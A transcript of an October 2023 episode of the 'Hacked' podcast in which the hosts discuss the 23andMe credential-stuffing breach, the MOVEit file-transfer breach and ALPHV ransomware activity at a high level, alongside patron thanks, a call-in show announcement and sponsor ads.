Podchaser Logo
Home
23andMe Exposed + AI Watermarks + Announcing Hotline Hacked

23andMe Exposed + AI Watermarks + Announcing Hotline Hacked

Released Monday, 16th October 2023
Good episode? Give it some love!
23andMe Exposed + AI Watermarks + Announcing Hotline Hacked

23andMe Exposed + AI Watermarks + Announcing Hotline Hacked

23andMe Exposed + AI Watermarks + Announcing Hotline Hacked

23andMe Exposed + AI Watermarks + Announcing Hotline Hacked

Monday, 16th October 2023
Good episode? Give it some love!
Rate Episode

Episode Transcript

Transcripts are displayed as originally observed. Some content, including advertisements may have changed.

Use Ctrl + F to search

0:01

I just took a DNA test. Turns

0:03

out I'm 100% that victim of a massive data

0:06

breach. This week on Hacked,

0:08

genetics firm 23andMe reveals user

0:10

data stolen. We're going to talk about it. We're

0:13

also going to talk about the Move-It

0:15

breach. Finally, it's been a few

0:18

months in the making, but it seems to be tying into many

0:20

of the stories and things that we're looking at and reading today.

0:22

Then since the early days of generative AI, we've been

0:24

hearing about how crucial a role watermarking

0:27

is going to play in fighting misinformation

0:29

and maintaining copyright. How is that going?

0:32

According to experts, poorly. We're

0:34

going to talk about it. Also the

0:37

group known as Alpha,

0:40

Alpha, Alpha, Black

0:43

Cat, whatever you'd like to call them, the ransomware

0:45

group is back at it. So

0:47

we talked about them in the Las Vegas episodes. They

0:50

are back at it again. So we're just going to touch

0:52

on what they're up to. All that and more in this

0:54

chat episode of Hacked.

1:00

Scott, how are we doing this week?

1:12

Good,

1:18

good. I'm

1:21

moments away from jetting

1:23

over to your part of the world and going to pick

1:25

chanterelle mushrooms in the wild. So

1:29

I'm off for the weekend to go mushroom picking.

1:32

So that should be fun. Not the mushroom type

1:34

that I think most people would think, but probably

1:38

going to make some good risotto. It

1:40

should be nice. You

1:43

can make a good risotto with the other kind of mushrooms people

1:45

are thinking about. Oh my God, could you? I've never even

1:47

thought about that. That seems treacherous. No,

1:51

it is treacherous. It's

1:53

very true. That's a good word for it. It would be a treacherous

1:56

meal. The

1:58

yeah, but we'll be kind of.

1:59

up until Fino so hopefully we'll get a little surfing

2:02

into we'll see how the waves are but we're mostly

2:04

there to pick mushrooms so we'll see how that goes good

2:07

times I've actually never been up to Tofino me and

2:09

my partner were just talking about going up there sometime

2:11

soon as well you know what neither have I

2:13

shocking oh sick to everybody

2:16

that I know island living I don't live

2:18

in but I have not not done it island

2:21

Scott I don't think I've ever seen island

2:23

oh island Scott existed like when I lived

2:25

in when I lived

2:27

in Hawaii island Scott was was full

2:30

full-fledged full on oh

2:32

yeah I forgot you did have an

2:35

island Scott era yeah I did I did I would

2:37

love to have another island Scott era honestly

2:39

maybe that's something that I should be sure tuning

2:41

my life for is to become an islander

2:44

again board shorts every

2:47

day every day every

2:49

day board shorts Hawaiian

2:51

Hawaiian print floral button-ups

2:54

you know it's a it's a vibe it's a vibe

2:57

and yeah I got can't lie I enjoyed that vibe

2:59

very much you know who also brings

3:02

a sort of easy breezy flower

3:05

floral print board shorts island kind

3:07

of vibe who's that I'm talking about Sarah

3:09

Gardner our new patron

3:11

on our trusty patreon

3:14

oh yes yes

3:16

thank you very much Sarah and I think

3:19

Walt Kim bro would also vibe vibe

3:22

pretty hard in the hacked island compound I think he

3:24

would I think Walt Kim bro has like I'm

3:26

seeing him with like a Mai Tai a big a

3:29

big drink like a really big

3:32

island vibe drink him

3:35

and him and Floyd Clark and Floyd

3:37

Clark is running the Margaritaville constantly

3:40

at the island villa yeah that's them they're

3:42

out there Floyd Clark thank you very much and putting

3:45

a pin in the whole thing fittingly Ender

3:49

I think I think Ender's like the dark horse and

3:51

the island he's sort of overseeing it isn't

3:53

like the in the birds nest up top making

3:55

sure everything's okay maybe like a lighthouse Ender

3:59

What a name to end. I

4:02

know, right? Except for the sad, the

4:04

sad fact that

4:06

we have one more. Suffagen Bonnie.

4:09

Oh, we did miss

4:11

one. I jumped straight into the middle of the list. I'm so

4:13

sorry, Sufjan Bonnie. Thank

4:16

you so much for your support. It

4:18

means a lot to us. And also, we're going to see

4:20

you. You get a hammock for that. You get like a really

4:22

nice hammock and

4:25

a drink made of a coconut. A cabana.

4:28

A cabana

4:30

by the by the ocean. Cabana with a coconut

4:33

drink. Thank you all so much for your support.

4:36

If you also want to support tech

4:40

storytelling and bullshit about tech,

4:42

I don't know if we curse on this show. You

4:45

should support. We do. Great.

4:48

I should know that. I curse on this show. Me

4:50

too. I guess I did know that. I've told a guest

4:52

recently they can curse on this show. So you can curse on

4:55

this show. All of you supporters,

4:57

new and old, can curse on the show. If you want to support

5:00

tech content and stories and chat,

5:03

hackedpodcast.com. It's a great way to support the show. It

5:06

directs to our Patreon and it means the world to us.

5:09

No problem.

5:12

Any

5:15

other news now that we've got our travel

5:18

stories and plans out in the open and a

5:20

bit of patron thank

5:22

yous? Is there anything else we want to touch on before we get going?

5:25

Maybe a new

5:28

thematic episode type that we're thinking

5:31

about doing? Yeah, I

5:33

think we maybe do. So fun little

5:36

insight for users. My cat is ferociously

5:38

attacking me right now. I'm just

5:40

going to pod through it. I'm podding through.

5:43

We're going to do a little experiment. I'm

5:45

hoping the website's up and running good

5:47

by the time we drop this one. So

5:50

a few episodes ago we talked about the idea of a call-in

5:52

show. I love call-in shows.

5:54

I think, Scott, you've expressed some appreciation

5:57

for them in the past. Classics.

5:59

They're classics. You got your love lines. It's

6:02

a great medium, it's a great format. And

6:04

we just started thinking about what would it be like if

6:07

there was, I don't know, some kind of a hotline,

6:11

a hacked hotline, dare

6:13

I say, a hotline hacked?

6:16

I could have handed it to you on that

6:18

one. You were- You could have handed it to me, but

6:20

you chose not to. You wanted to hit it. It's

6:24

your name, you take the credit,

6:26

you roll with it. I chose violence. This isn't

6:28

hotline Miami, it's a hotline hack. Yeah,

6:30

all good, all good. Yeah,

6:34

the idea behind it. Take it away.

6:36

Let's give everybody a little thing. Is we're

6:40

gonna have essentially a voicemail

6:42

line. You can call and leave a message

6:44

where you tell us a story about

6:47

either a cybercrime that you committed

6:50

or a cybercrime that was committed to you or

6:52

that you were aware of or in the

6:54

periphery for if you're like a security

6:56

officer and we're

6:58

gonna kind of listen to these back and figure out which ones are

7:01

kind of good stories and we're gonna turn them

7:03

into episode content. You

7:06

got it. What do you think of that? I think that's bang

7:08

on. I think it's like we want those

7:10

cybercrimes, but we just want like strange tales

7:12

of technology. Like maybe you hacked

7:15

into something, maybe you solved an internet mystery,

7:17

maybe you like got into

7:20

a thing you shouldn't have. We just

7:22

want you to either submit an audio file or leave

7:24

a message at the hotline and we'll talk

7:26

about it on these hotline hacked episodes.

7:28

If this worked, if it

7:31

might not work, this might be the last you

7:33

hear about this. We might get no content.

7:36

Nobody reaches out. The content might be, I say

7:40

this with so much love, unhinged and

7:42

we just won't do this. But I'm

7:44

hoping, we talked to so many people

7:46

that listen to this show and they always have these really cool stories

7:49

and I never quite know, we

7:52

never quite know what to do with all of them, whether

7:54

or not they can make up a whole episode. And

7:58

this is just a space where we can talk about different

8:00

stories and sort of speculate

8:02

about what people call in and leave

8:05

on the hotline hacked. So there will

8:07

be an email option to email in either

8:09

text or an audio

8:11

file. We do send

8:13

in an audio file. Be aware that we

8:15

probably will play it in the episode. Same with

8:18

the phone number. Or at least an edited version of it. Yeah.

8:21

Same, yeah, yeah. Same with the phone number voicemail,

8:23

so be aware. If you

8:25

wanna make sure it's more anonymized, just

8:27

send it in some text and then we'll digitize it

8:30

into the voice of a reader and use

8:32

that. Or we'll read

8:34

it ourselves, one of the two. Or we'll read

8:36

it ourselves. Yeah, if you wanna submit text, there's the email

8:38

on the website. And

8:41

as we said, it's kind of as anonymous as you make

8:43

it. You can go to hotlinehacked.com. Hotlinehacked.com

8:47

to find... Hotline...

8:49

Take it away. Land it. Land

8:52

the plane. I was gonna say, hotlinehacked.com.

8:56

Hotlinehacked.com. Visit it today. Visit

8:59

it today. I'm gonna

9:01

record like, oh man, like weird late night infomercials

9:04

for this. We should also

9:06

tell everybody before anybody visits the

9:08

website that Jordan generated

9:10

the website on chatGBT. So

9:14

it's very basic, it's very

9:16

functional. It's got some pretty sweet

9:19

JavaScript text coloring elements.

9:22

I wasn't fishing for you to compliment the JavaScript,

9:25

but I do appreciate it. Hey,

9:27

hey, hey. I'm here for you. Last

9:30

week it's Python, this week it's HTML and

9:32

CSS. Like who are you? The

9:34

next thing you know, you'll

9:37

be writing malware and rust. We'll

9:39

all be in trouble. Then what?

9:42

You'll be joining Alph-Va. Alph-Va. Alpha or

9:44

Alph-Va. Alph-Va. And

9:47

maybe you're part of Alph-Va or Clop

9:49

or any number of people getting up to stuff. Maybe you just

9:51

have an interesting story, but we would

9:54

love to hear it at hotlinehacked.

9:57

Here are brand spanking new.

10:00

franchise or our whatever

10:02

happened to that that someone asked us in

10:04

five episodes. Only one of the two.

10:06

Dead in the water idea. Totally. Yeah,

10:09

yeah. Speaking

10:13

of which, I heard this interesting, I read in

10:15

our news articles, it has nothing to do with anything we're about

10:17

to talk about, but I thought it was funny. You

10:20

made us like use a little statement that made

10:22

me realize it is, did you know that there's apparently

10:24

a generational shift for

10:27

the phrase out of pocket? So

10:30

like, we found like, Jordan's out of pocket

10:32

this weekend. To me, that means like Jordan's

10:34

kind of wiling out. You know, he's like, he's

10:37

out of pocket. Oh. But apparently

10:39

in the older generations, out of

10:41

pocket means like I'm out of the office. It's

10:43

like, oh, I'm gonna be out of pocket today at two.

10:46

And it's everybody's like, huh? Oh,

10:49

I had no idea. But apparently there's this generational

10:51

gap for the phrase out of pocket.

10:54

I just found it interesting. I have no idea why I just inserted

10:56

this, but I found it interesting. I thought you'd find it interesting.

10:59

I do find it interesting. You know how I feel about idioms

11:01

and etymology. See, what's

11:03

interesting about that is that I thought,

11:06

I think of out of pocket as neither of those things.

11:08

Really? I don't think of it as being like in absentia

11:10

or wilding out. I think of it as being

11:13

like based, like about money

11:15

and transactions. Oh, like you. Like

11:17

it was like the cost of the concert was like

11:19

a bunch of the example on Google. I'm not gonna, someone's

11:22

gonna check and see that I'm reading this. The organizer of the

11:24

concert was $15,000 out of pocket after

11:27

it was canceled. Yeah, that's how I think of it. Like

11:30

it's a cost thing. Like you put money up

11:32

for that. I think I see that

11:34

too. Like that's a classic. I'm

11:37

out of pocket 10 grand for this or whatever, but

11:39

it's like, if I'm like Jordan's

11:42

out of pocket, does your mind

11:44

go to, is Jordan in the office

11:47

or not in the office or does it go to, is

11:49

Jordan? It doesn't go to East Jordan. It was

11:51

actually on the beach at the Hack Cabana

11:54

because mine goes to the ladder. Interesting.

11:58

My brain goes. exclusively to Jordan

12:01

did a bad business. Now he's feeling

12:03

it. Like, wow.

12:06

He spent all that money on the hacked cabana.

12:09

And now he doesn't have that money because

12:11

of the storm that claimed the hacked

12:14

cabana. That's what I think about a

12:16

pocket. Okay.

12:19

Interesting, but I think we should move through

12:21

this. Yeah. Let's get into this one. Five

12:24

years ago, there was a situation with a

12:26

DNA testing service called MyHeritage.

12:30

Someone breached 92 million of this DNA

12:32

testing company's accounts. Do you remember this?

12:35

I do not. It wasn't

12:37

a good news story, but when they announced what

12:39

the infiltrator got access to, there

12:42

was sort of a sigh of relief because

12:44

they got access to encrypted emails and passwords. And

12:46

everyone went, oh, for sure, user data. Exactly.

12:50

Everyone went, phew, that could have been bad because

12:52

they never reached any kind of genetic data. I

12:55

was reminded of that this past

12:58

Friday when 23andMe, a

13:00

US-based biotechnology and genomics

13:03

firm, confirmed a data breach

13:05

of their user accounts. The company

13:07

said that hackers accessed certain

13:10

counts of 23andMe users. I would

13:12

say it's not just any genetic

13:15

testing company. That's got to be

13:17

the biggest one I know of. They're

13:19

the one I think. Yeah,

13:21

I know lots of people that have done

13:24

23andMe testing. Yeah,

13:26

me too. I remember a few

13:28

years ago thinking about doing it, and

13:31

I didn't not do it because of

13:33

some privacy-based

13:35

awakening. I didn't do it because I lost

13:38

interest. It's there but by the grace

13:40

of gog. And let's be clear, not every

13:43

single 23andMe account was breached.

13:45

And it's not to say that 23andMe itself

13:48

was necessarily breached.

13:50

There's some nuance here. But

13:52

the outcome is pretty gnarly. And

13:54

I think it kind of paints a picture

13:56

of what a spectrum of genetics-based

13:59

lead is. can look like.

14:02

This

14:05

announcement came a couple days after hackers started advertising

14:07

an alleged sample of

14:10

this 23andMe user data on the hacking form breach forms

14:12

offering to sell these profiles for between $1 and $10.

14:16

These sort of early samples, which a couple

14:19

different places were able to verify, were organized

14:22

based on the descent of the users.

14:25

So there was essentially a little

14:28

cluster being sold of 100,000 Chinese users. There

14:32

was a cluster being sold of a million

14:34

Ashkenazi Jewish descendant users.

14:38

A spokesperson from 23andMe confirmed

14:40

that the data that is in these leaks is legitimate.

14:43

And what it looks like happened is threat actors

14:45

used essentially a credential stuffing attack. So

14:48

credentials that were in other breaches that were recycled

14:51

on 23andMe were used to get into these accounts. Quote,

14:55

they clarified, quote, we don't have any indication

14:58

at this time that there has been a data security incident within their systems. It

15:02

was a credential stuffing technique. Let's

15:07

segue before we get into the actual

15:09

hack and to talk about credential stuffing just a bit.

15:12

If you're an old hacked fan, you would have listened to

15:14

the problem with passwords. I

15:17

think it was one of our

15:19

first four or five podcast episodes. And

15:22

I think that this style of attack is

15:24

the main reason why you need a unique password for every

15:26

site or else you just become... With

15:30

the scale and velocity of data exploitation

15:32

style hacks where they're

15:34

pulling out user records, if

15:39

you have a password that's guessable, even

15:41

within a reasonable timeline of months,

15:45

chances are you're vulnerable to having a pretty nasty set of

15:47

this style of attacks happen to you. I

15:52

think that that's something... I've

15:54

set up my wife's password

15:56

manager now, everybody that I come

15:59

into. recommend them using unique

16:01

passwords on everything, complex passwords

16:04

as well as changing them with frequency. And

16:06

I think that's as long as we live in this

16:08

antiquated password-based life, which

16:11

I don't think we're gonna get away from because even

16:13

if we use other things as forms

16:15

of biometrics or whatever,

16:18

all they do is get encoded into passwords anyway.

16:20

So realistically it's all just data.

16:23

So at the end of the day the

16:25

best thing to do is to just have different data

16:27

for each site so that this doesn't become

16:29

a problem for you. 100%.

16:31

For the

16:32

folks that it did become a problem

16:35

for, leaked data included

16:37

full names, usernames, profile

16:39

photos, sex, date of birth, geographical

16:43

location, and genetic ancestry

16:45

results. So a

16:48

pretty gnarly doxxing as

16:50

doxxings go. A

16:53

bleeping computer found that the number of accounts sold

16:55

by cyber criminals doesn't necessarily

16:57

match the number of 23andMe accounts

17:00

that were breached using the exposed credentials.

17:02

At the heart of this whole thing is something

17:04

called this DNA relatives feature.

17:07

And what it's essentially like a toggle that you

17:09

can choose to use or not use that lets you find

17:11

and connect with genetic relatives, indexes

17:15

other people that share some sort of genetic

17:17

relationship with you based on your 23andMe

17:19

results. And what it looks like the

17:22

threat actor did was they were by

17:24

only by accessing a few 23andMe

17:27

accounts through this credential stuffing, they

17:30

were able to scrape enough data from the DNA

17:32

relative matches to start building out essentially

17:34

like a database of different people that shared

17:37

certain genetic markers. This is

17:39

how we ended up in a situation where you would have a breach

17:42

of just here's a list of people that share this

17:45

ethnic background. You wouldn't

17:47

really be able to do that without a system

17:49

like DNA relatives unless the

17:51

hacker had gotten full access to

17:53

23andMe systems. But because

17:56

of that feature, just through user

17:58

accounts, they were able to create these, you know, million

18:00

strong entrance. And

18:07

given that we know more accounts were breached than

18:12

have been exposed in

18:14

these leaks, we

18:17

can probably assume more of these lists are

18:19

going to come. Yeah,

18:23

I feel like this is going to be one of those data sets and

18:29

it becomes the classic thing

18:31

of like, it's

18:34

like the Ashley Madison hack. If

18:39

you were in there, it's like the damage

18:41

was done. You

18:44

don't need to sell it or, you know, there's

18:48

no way to look to monetize this, but

18:52

it's like if all of your genetic data is floating

18:54

around on the internet, plug

18:57

them in, oh yeah, his data is here. Oh,

19:01

look, he's got hereditary markers

19:05

for XX and X. Okay, denied. You

19:10

kind of beat me to the thing I wanted to

19:12

bring up, which

19:15

is that like, I don't really know, when

19:17

I think of like a breach form, where

19:20

people are buying and selling this information,

19:24

and it's not a short

19:27

term. But

19:29

what we know is that the information that's in these data breaches

19:34

that we think of as being

19:36

bought and sold from cybercriminals tends

19:40

to end up on a long enough timeline getting

19:42

packaged up and bought and sold and

19:45

bought and sold, and

19:48

it kind of works its way up the chain of legitimacy

19:52

from these to companies that shouldn't be buying this

19:54

data illicitly but have a huge financial

19:57

incentive to have it. that's

20:00

where genetic breaches go. And

20:02

it would be an icky world if that's where it goes.

20:06

But we don't live in an icky world, do we, Jordan? I

20:09

sure hope not. I

20:11

sure hope not. The last thing

20:13

on this one, I went down a bit of a rabbit hole because

20:16

I saw that first story from a few years

20:18

ago. I remembered it. And I went

20:20

looking for like breaches and

20:22

data leaks relating to genetic information.

20:25

And there's this Wapo story from 2022, quote,

20:28

since the beginning of last year, more than a dozen

20:30

medical labs, genetic testing companies and fertility

20:33

firms have disclosed breaches affecting more than 3.5 million

20:35

people, according

20:37

to a cybersecurity 202 review of data breaches.

20:40

Wow. And it's just interesting

20:42

to me that, small labs

20:45

that have the actual, like

20:47

people's genes, like the actual

20:49

raw data are as good

20:51

an attack target as like

20:53

a massive company like 23andMe, depending

20:56

on how granular this data is. And

20:58

it just sort of makes me reflect on the more and more

21:00

genetic data we start producing and digitizing,

21:03

the bigger a target is gonna become. And unlike

21:05

a credit card, there

21:08

are some things you can't really change when they get leaked. See,

21:13

the problem is like this data is super valuable

21:15

too to the person. Like if you know you have

21:17

specific markers for heart diseases

21:19

and cancers, you can be well aware and

21:22

more up on making

21:24

sure that you're checked and tested.

21:26

Totally. There's a lot of positive that can come

21:28

to this data. So it's sad that

21:31

it just becomes one of these things where it's like, well, there's

21:33

a bunch of negatives that can come out of it too. And it's

21:35

just a byproduct of the world we live

21:37

in. But I think over the next 100 years, we'll

21:40

see changes come to the industries

21:43

that were worried about having this data. And

21:46

hopefully changes come to the industries that

21:49

we hope have this data. Yeah,

21:51

it's true. Like if my family doctor knew what I'm like,

21:54

you know, medical history of your

21:56

parents is such an important thing. And

21:58

it's like, well, this is... your DNA

22:01

essentially is the codified

22:03

version of the medical history of your family. So

22:05

it's like, now that they've deciphered

22:08

the codes, having the code

22:10

is a good thing. And it's like, I think that this is probably

22:13

something that in society we don't take advantage

22:15

of enough. No, it's true. From a wellness

22:17

and health perspective. Yeah, I wanna see

22:20

us getting better at leveraging

22:23

genetic data and be really

22:25

like, I

22:28

think a lot of the ways big companies handle

22:31

data breaches, it's like I'm regularly

22:33

kind of disappointed by it because it's like anything,

22:35

it's PR. You're trying to minimize a situation.

22:37

You're not necessarily being totally forthright

22:40

with what happened. And this is such a

22:43

delicate, sensitive thing. That

22:46

like, we need to build systems of security

22:48

and trust to allow us to have

22:50

this information and to use it to the best of

22:52

our ability. If the potential upside isn't like

22:55

a better chat messaging app, it's like

22:57

people's lives. The stakes are very,

22:59

very high. We should be advancing

23:01

this and getting better. But like, man, we

23:03

just need more trust and more security

23:06

in these systems. Icky

23:10

shit will happen. That

23:12

to me is a perfect segue to

23:15

the Move It breach. If you wanna talk about Move It breach.

23:17

Heck yeah, let's talk about the Move It breach. So

23:20

Move It is a data

23:24

transfer system created

23:26

by Progress Software that

23:29

is built to be a

23:31

movement system of high security to

23:34

move hypersensitive information.

23:37

Corporate secrets, personal information,

23:40

HR stuff, anything that's,

23:42

you need to move, but you wanna make sure it doesn't

23:46

get out there. Like

23:48

if you go to their website, they have first

23:51

sentence at the top of the page is talking about security

23:53

standards and protocols and cybersecurity

23:55

things. Anyway, so

23:57

one of these

23:59

pieces of software.

23:59

Move It by Progress

24:02

got compromised. And it's not the first one of its

24:04

kind to be compromised because it's actually hacking groups

24:07

that target these styles of software because

24:09

they know that they're so valuable. So

24:13

it's the same thing. Same thing as the genetic data.

24:16

It's like if you put a bunch of valuable

24:18

information into a place, people

24:20

that want valuable information are gonna try to get

24:22

it. And it's the same thing with Move It. So

24:25

Move It was behind, I believe

24:28

it was the MGM hack or

24:30

one of the Vegas hacks or both of them

24:32

maybe. Can't remember. It

24:34

was behind the Sony hack that we talked

24:36

about last time. And it's been

24:38

behind a boatload of other hacks. Like they're estimating

24:42

something like 600 organizations of fallen

24:44

prey to one ransomware's groups

24:46

use of it. So even

24:49

the vulnerability, the CV that came out on

24:51

it was given a 9.8 out of 10. So

24:53

like essentially out of all the severity

24:56

that like a potential vulnerability and a piece of software

24:58

could have, this is like one of the top. Yeah.

25:02

So I didn't know what Move It was.

25:05

And the thing that with this on my radar,

25:08

like you said, last episode, we talked about these

25:10

sort of, what were then brief early murmurings

25:13

of another Sony leak. And

25:16

I was fascinated as you brought up to find

25:18

out that it was part of what's looking maybe

25:20

by the numbers like one of the biggest hacks of 2023. Not

25:24

a singular hack. Part

25:27

of this much sort of a supply chain attack

25:29

involving this file transfer protocol,

25:31

maybe you could call it Move It. File

25:33

transfer system. Yeah. So

25:35

Sony confirmed that they were part of this Move

25:37

It breach. For them it was 6,800 users. Data

25:41

extortion gang CLOP has claimed

25:43

responsibility for the breach. The

25:46

breach seems to have exploited a zero day vulnerability

25:48

in Move It. And it's looking, as I

25:51

said, like probably, yeah, one of the biggest hacks

25:53

of 2023 and potentially

25:55

in like over the last couple years, it's

25:57

looking like you mentioned the 600 through. One

26:00

Ransomware Gang. 56 million

26:07

individual users across that and

26:11

a global cost of close to 11 billion as

26:14

of time of recording. Pretty

26:18

astonishing. Affected

26:21

entities so far have included Shell, British

26:23

Airways, Sony, and the US Department of Energy. Progress

26:27

Software, you mentioned, but

26:30

clearly as we are seeing this month, the

26:32

damage has already been done. This

26:35

vulnerability I think dates back to April, if

26:39

I'm not mistaken. The

26:41

first things you heard about

26:43

it dated back to April. They patched it pretty quick,

26:47

but of course like any kind of system software

26:50

that has remote deployments and stuff, whether

26:54

IT departments around the world patched fast enough,

26:56

things like that, or whether there was already access granted to

26:59

the world. The

27:01

way the exploit works too, is

27:04

it's kind of a classic SQL injection. They

27:08

can kind of force a piece of SQL into a query going into it, which

27:12

then causes remote code execution. I

27:15

think what they were doing is using it to deploy web

27:18

shells and essentially remote access

27:21

shells so they could get in, either A, go through

27:23

the database, and

27:26

then they could get in and get in and get in. And

27:29

that's where the answer is because that's where

27:32

they were. Or they could create new accounts, etc. So

27:35

I know that they were using it as a jump off

27:37

point to launching attacks

27:40

further into networks, which is what I think

27:42

happened with Sony, if I'm not mistaken. They

27:44

managed to kind of

27:46

get in

27:47

and kind of spider through the networks.

27:49

Not good. It's

27:52

a massive remote shell exploit.

27:56

And

27:58

the world's paying the price for it.

28:00

Yeah, there's typically like, I

28:02

don't know, it's always sort of hard to, maybe

28:05

none of these attacks ever really have that much

28:07

of a narrative, but it's a lot easier to make a narrative

28:09

when it's a hacking group going after one individual

28:11

target. This is so strange because you have

28:14

like, British Airways and the Department

28:16

of Energy, you also have like healthcare facilities

28:19

to sort of go back to what we were talking about with

28:21

genetics. A bunch

28:23

of sensitive information is already being confirmed

28:25

as having leaked, as being stolen

28:27

as part of this vulnerability. Lab

28:29

test results, born Ontario,

28:31

a government birth registry, recently disclosed

28:33

a move it related attack. It

28:36

looks like hackers stole data from 3.4 million people, including

28:39

two million babies, expected parents

28:41

and people seeking fertility care. That

28:44

data gathered over like a decade as

28:46

part of this attack that was not

28:48

explicitly targeting birth registries,

28:51

but because this was a supply chain

28:53

attack of a very commonly used

28:55

like tech utility, they

28:58

just sort of got the keys to a bunch of different

29:00

castles, including one

29:03

with two million babies in it. And

29:05

Sony. And Sony, and your PlayStation.

29:08

And Sony, and your PlayStation.

29:11

The, yeah, big, big,

29:14

big problem, big hack, big

29:16

vulnerability. And

29:19

the reality is there's probably still unpatched

29:21

versions of it kicking around. So I think we're still

29:23

seeing, like there's still exploits

29:26

and hacks that are connected back to

29:28

this coming up now. So

29:30

it's funny that it's a piece of,

29:34

well, it's not funny. It's ironic that

29:36

it's a piece of software that was acquired,

29:40

set up and configured to

29:42

make sure that privacy was upheld

29:44

and to reduce the risk of stuff like this. And

29:46

then next thing you know, that's the main

29:49

thing that's kicked the door open

29:51

on it. Okay,

29:53

when we come back from the break, when

29:56

we talk about AI watermarks and

29:59

the folks. over at Alpha. Hello,

30:30

whether you are selling scented soap or offering outdoor

30:33

outfits, Shopify helps you sell everywhere.

30:36

From their all-in-one e-commerce platform to

30:38

their in-person point of sale system, wherever

30:41

and whatever you are selling, Shopify

30:43

has got you covered. Shopify helps you turn

30:45

browsers into buyers with the internet's best converting

30:48

checkout, 36% better

30:50

on average compared to other leading commerce

30:52

platforms. What I love about Shopify

30:55

is that no matter how big you want to grow, Shopify

30:57

gives you everything you need to take control

30:59

and take your business to the next level.

31:03

Sign up for a $1 a month trial

31:05

period at Shopify.com slash

31:07

hacked, all lower case. You

31:09

go to Shopify.com slash

31:12

hacked, right now to grow your

31:14

business no matter what stage you are

31:16

in. That's Shopify.com

31:19

slash hacked. This

31:21

episode of hacked is supported by Compiler,

31:24

an original podcast from Red Hat discussing tech

31:27

topics big, small and strange. Compiler

31:29

comes to you from the makers of Command Line Heroes

31:32

and is hosted by Angela Andrews and

31:34

Brett Simino. Compiler closes the

31:36

gap between those who are new to tech and

31:38

those behind the inventions and services

31:41

shaping our world. Compiler

31:43

brings together stories and perspectives from the industry

31:45

and simplifies its language, culture

31:48

and movements in a way that is fun,

31:50

informative and guilt-free.

31:53

I checked out the In Defense of Legacy

31:55

Technology episode and it's all about how younger

31:57

IT professionals often start their

31:59

career. working on legacy hardware and software,

32:03

and upgrades aren't always an option. It's kind of about

32:05

asking that question, how can they learn and grow

32:07

while still working with older technology?

32:09

Very interesting story. Listen

32:12

to Compiler, in your favorite podcast

32:14

player. We'll also include a link in the show notes.

32:17

My thanks to Compiler for their support.

32:19

Today's podcast is sponsored

32:22

by NutriSense. That was the sound of the NutriSense

32:24

biosensor. It's a small device you can put on the back

32:27

of your arm that then provides real-time feedback

32:29

on how your body responds to the foods that you are eating,

32:31

your exercise, stress, and even your sleep. With

32:34

NutriSense, you can just take a photo of your meal, adjust

32:36

your portion size, and NutriSense does the rest.

32:39

NutriSense helps you track your data, see your glucose

32:42

trends, and understand your macronutrient breakdown

32:44

for each meal. You also get an overall

32:46

glucose score for each meal based on your body's

32:48

response. You'll be matched with a board-certified

32:51

nutritionist who will review your data

32:53

and answer all your questions. Plus,

32:56

they can help you get a personalized nutrition plan so you can help

32:58

achieve your goals. Try NutriSense

33:00

today. It will open your eyes in profound ways to how your

33:02

food, exercise, and lifestyle choices are affecting

33:05

you. What's more, it empowers you with a real-time

33:07

feedback loop showing the consequences of your food

33:09

and lifestyle choices. It is a powerful

33:12

tool for understanding your body and affecting positive

33:14

change in your life. You can get all this

33:16

today. NutriSense has a special offer

33:19

for our listeners. Visit NutriSense.com

33:21

slash hacked and use promo code hacked to

33:23

start decoding your body's messages and pave

33:25

the way for a healthier life. Be sure to tell them that

33:27

you learned about NutriSense on Hacked Podcast.

33:30

That's NutriSense.com slash hacked. Save $30

33:33

off your first month, plus get a month of board-certified

33:36

nutritionist support.

33:37

Let's talk interest rates. Not that kind

33:39

of interest. I mean, interest in you.

33:41

At First Merchants Bank, we are 100% interested in your success.

33:45

Our bankers provide a level of attentiveness unlike

33:48

any other. We're here to get to know you and

33:50

to be a helpful partner in your financial success. Aren't

33:52

you tired of your bank just saying they care about

33:55

your business? Make the switch to First Merchants

33:57

Bank and feel the difference of real, honest

33:59

interest.

33:59

First Merchants Bank. For a better

34:02

banking experience, visit firstmerchants.com slash

34:04

switch. Helping you prosper. Member FDIC

34:07

Equal Housing Lenders. Before

34:10

we started recording,

34:11

we were like, we

34:13

gotta pick a way to say it. And then both

34:15

of us immediately, the second it started, we were

34:17

like, Alphava, Alphava, Alphava. Like, we went

34:19

immediately back to not knowing how

34:21

to say their name. It

34:24

is unpronounceable. Yeah, Black Cat was their

34:26

original name, and that's like, that's a word that I

34:28

know how to say. Yeah, sure. Black Cat. I got my feet

34:31

under me with that one. Alphava,

34:34

Alpha. I

34:36

just gotta call it Alpha. So yeah, anyway,

34:39

Alpha's back. Tell me about it. They're back

34:42

stirring up some stuff. Yeah, so they compromised

34:46

a Florida Circuit Court and

34:48

apparently have stolen a bunch of employee information,

34:52

including applications

34:54

for careers and things like that, I think, is

34:57

what I read. So they were related

35:01

to the MGM stuff. And

35:04

yeah, they just keep going. So I'm

35:06

not sure if this is associated in the same

35:09

kind of way that they got access to

35:11

MGM, whether it was a phone call to an

35:13

IT department that led to an endless

35:15

amount of problems. But they're

35:18

back, and they're still mucking

35:20

around. Interesting. Yeah,

35:23

because my memory of the casino

35:26

hack was that Alpha was responsible

35:28

for the ransomware and Scattered Spider were the

35:30

social engineers. And you raise a really

35:32

fascinating question of, like, does

35:35

Alpha do the social engineering too? Like, what

35:37

is their capacity? I think we gotta start reading

35:40

more about these folks. Maybe

35:43

one will call hotlinehack.com, and

35:46

we can play it on the show.

35:48

And maybe we can talk about it. It's

35:50

an interesting one, because we never really

35:57

have a great sense of the timelines. We read about

35:59

a story I feel like the very next week, the same crew of

36:01

people is on to stuff. And I do wonder, is

36:04

there a lag in the publicity

36:06

of these attacks, or are they really cooking

36:08

it that quickly? Did they really just wrap up doing

36:10

a full Oceans 11 and immediately kick

36:13

it over to a Florida court judicial circuit

36:16

where they

36:18

dropped a bunch of information on a website? It looks like

36:20

the Florida circuit didn't, court

36:22

didn't pay the ransomware, and that's

36:24

why the data was there. I'm

36:28

so fascinated by that. Internal

36:30

conversations, that's something, there was

36:32

a, yeah, ransomware diaries was so

36:34

cool about that because it was specifically concerned with

36:36

that process of negotiating ransomware

36:40

and making the decision of whether or not you

36:42

want to pay for it. And there was

36:44

such cool reporting into that because it is such a

36:46

private, secure process that

36:48

people don't want to let people into. People

36:51

don't want to talk to journalists about it. And the fact that he was

36:53

able to do that, if you never listen

36:55

to that show, go back and listen to the feed drop we

36:57

did last year with them. It

37:00

was a very fascinating one. And the, yeah, it's interesting

37:02

